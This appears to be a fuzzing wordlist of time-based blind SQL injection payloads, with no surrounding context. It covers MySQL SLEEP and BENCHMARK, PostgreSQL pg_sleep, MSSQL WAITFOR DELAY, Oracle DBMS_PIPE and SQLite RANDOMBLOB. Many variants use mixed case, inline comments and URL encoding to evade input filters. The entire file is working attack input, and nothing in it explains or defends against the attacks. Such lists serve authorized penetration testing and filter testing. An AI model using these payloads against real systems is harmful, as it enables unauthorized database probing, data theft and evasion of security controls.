' OR SLEEP(5); --
' OR SLE/**/EP(5); --
' oR' Sl%eEp(5); --
') sle%EP(5); --
' && Slee%P(5); --
';waitfor delay '0:0:5'--
\"';waitfor delay '0:0:5'--
';waItFor deLaY '0:0:5'--
';wai/**/TfoR dE/**/lAy '0:0:5'--
1 AND 1337=(SELECT 1337 FROM PG_SLEEP(5))-- 1337
1 or pg_sleep(5)--
pg_SLEEP(5)--
)) or pg_sleep(5)--
";SELECT pg_sleep(5);
;waitfor delay '0:0:5'--
';WAITFOR DELAY '0:0:5'--
';%5waitfor%5delay%5'0:0:5'%5--%5
1') WAITFOR DELAY '0:0:5' AND ('1337'='1337
%' WAITFOR DELAY '0:0:5'--
1') WAITFOR DELAY '0:0:5' AND ('1337'='1337
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))--
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337' LIKE '1337
')) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337' LIKE '1337
"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((("1337" LIKE "1337
1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5)
1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5)-- 1337
' AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND '1337'='1337
') AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND ('1337'='1337
) AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND (1337=1337
RANDOMBLOB(500000000/2)
